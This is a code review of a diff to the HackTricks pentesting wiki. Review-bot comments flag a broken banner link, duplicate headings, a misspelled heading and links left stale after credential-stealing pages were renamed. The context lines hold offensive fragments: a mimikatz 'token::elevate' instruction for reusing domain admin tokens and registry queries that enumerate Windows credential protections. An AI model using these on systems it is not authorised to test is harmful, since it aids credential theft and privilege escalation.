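Review bot: the Twitter `🐦` bullet in the rewritten banner still points at a malformed target, `https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md` (a GitHub tree URL with an escaped `[` and an emojipedia path glued onto it). Since this hunk already rewrites every bullet of the banner from `-` to `*`, point the emoji at `https://emojipedia.org/bird/` or drop the emoji link entirely so the bullet reads `follow me on Twitter @carlospolopm`; otherwise the rewrite ships the same dead link it inherited.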
@@ -339,16 +335,12 @@ Find a domain admin credential on the box and use that token: _token::elevate /d
-🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 +🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
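Review bot: this footer hunk is the same banner as the header hunk at the top of `credentials-mimikatz.md`, including the same broken `🐦` link, so whatever fix is applied to the header needs to be applied here too. Having the banner duplicated verbatim at both ends of each page is why this one cosmetic change touches two hunks per file; a single shared include for the banner would avoid the repeated edits.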
diff --git a/windows-hardening/stealing-windows-credentials/windows-credentials-protections.md b/windows-hardening/stealing-credentials/credentials-protections.md similarity index 99% rename from windows-hardening/stealing-windows-credentials/windows-credentials-protections.md rename to windows-hardening/stealing-credentials/credentials-protections.md index a830d9216..fc147d804 100644 --- a/windows-hardening/stealing-windows-credentials/windows-credentials-protections.md +++ b/windows-hardening/stealing-credentials/credentials-protections.md @@ -1,4 +1,4 @@ -# Credentials Protections +# Windows Credentials Protections ## Credentials Protections diff --git a/windows-hardening/windows-local-privilege-escalation/README.md b/windows-hardening/windows-local-privilege-escalation/README.md index 78607f12f..011c3aca7 100644 --- a/windows-hardening/windows-local-privilege-escalation/README.md +++ b/windows-hardening/windows-local-privilege-escalation/README.md @@ -322,7 +322,7 @@ reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\Subs ### WDigest If active, **plain-text passwords are stored in LSASS** (Local Security Authority Subsystem Service).\ -[**More info about WDigest in this page**](../stealing-windows-credentials/windows-credentials-protections.md#wdigest). +[**More info about WDigest in this page**](../stealing-credentials/credentials-protections.md#wdigest). ``` reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential 
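Review bot: in `credentials-protections.md` the H1 becomes `# Windows Credentials Protections` while the unchanged next heading is still `## Credentials Protections`, so the page now opens with two near-identical headings; drop the H2 or give it a distinct name. For the WDigest hunk in `windows-local-privilege-escalation/README.md`, the new target `../stealing-credentials/credentials-protections.md#wdigest` is consistent with the rename, but this patch only shows that one README being updated for the `stealing-windows-credentials/` to `stealing-credentials/` move; any other page still linking to the old directory will break, so the old path should be grepped for across the repo in the same change.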
@@ -331,7 +331,7 @@ reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v Use ### LSA Protection Microsoft in **Windows 8.1 and later** has provided additional protection for the LSA to **prevent** untrusted processes from being able to **read its memory** or to inject code.\ -[**More info about LSA Protection here**](../stealing-windows-credentials/windows-credentials-protections.md#lsa-protection). +[**More info about LSA Protection here**](../stealing-credentials/credentials-protections.md#lsa-protection). ``` reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL @@ -340,7 +340,7 @@ reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL ### Credentials Guard **Credential Guard** is a new feature in Windows 10 (Enterprise and Education edition) that helps to protect your credentials on a machine from threats such as pass the hash.\ -[**More info about Credentials Guard here.**](../stealing-windows-credentials/windows-credentials-protections.md#credential-guard) +[**More info about Credentials Guard here.**](../stealing-credentials/credentials-protections.md#credential-guard) ``` reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags @@ -349,7 +349,7 @@ reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags ### Cached Credentials **Domain credentials** are used by operating system components and are **authenticated** by the **Local** **Security Authority** (LSA). Typically, domain credentials are established for a user when a registered security package authenticates the user's logon data.\ -[**More info about Cached Credentials here**](../stealing-windows-credentials/windows-credentials-protections.md#cached-credentials). +[**More info about Cached Credentials here**](../stealing-credentials/credentials-protections.md#cached-credentials). ``` reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT 
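Review bot: the three retargeted links (`#lsa-protection`, `#credential-guard`, `#cached-credentials`) match the rename, but the Credential Guard hunk leaves the heading `### Credentials Guard` misspelled right above the line it edits; the feature is Credential Guard, as the link text and the `#credential-guard` anchor already say, so `### Credential Guard` is the fix while the section is being touched. Also note that these anchors depend on the section headings inside `credentials-protections.md` keeping their names; the H1 change in that file does not affect them, but the H2/H3 headings should be confirmed unchanged so the fragments still resolve.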
@@ -775,9 +775,9 @@ Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L ### Firewall Rules -[**Check this page for Firewall related commands**](../basic-win-cmd-for-pentesters.md#firewall) **(list rules, create rules, turn off, turn off...)** +[**Check this page for Firewall related commands**](../basic-cmd-for-pentesters.md#firewall) **(list rules, create rules, turn off, turn off...)** -More[ commands for network enumeration here](../basic-win-cmd-for-pentesters.md#network) +More[ commands for network enumeration here](../basic-cmd-for-pentesters.md#network) ### Windows Subsystem for Linux (wsl)
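Review bot: both retargeted links in the Firewall Rules hunk are consistent with the `basic-cmd-for-pentesters.md` rename, but the lines being rewritten carry two small defects worth fixing in the same edit: `(list rules, create rules, turn off, turn off...)` repeats `turn off`, and `More[ commands for network enumeration here](../basic-cmd-for-pentesters.md#network)` has the space inside the link brackets, so the rendered anchor text starts with a space and `More` sits outside the link; write it as `More [commands for network enumeration here](../basic-cmd-for-pentesters.md#network)`.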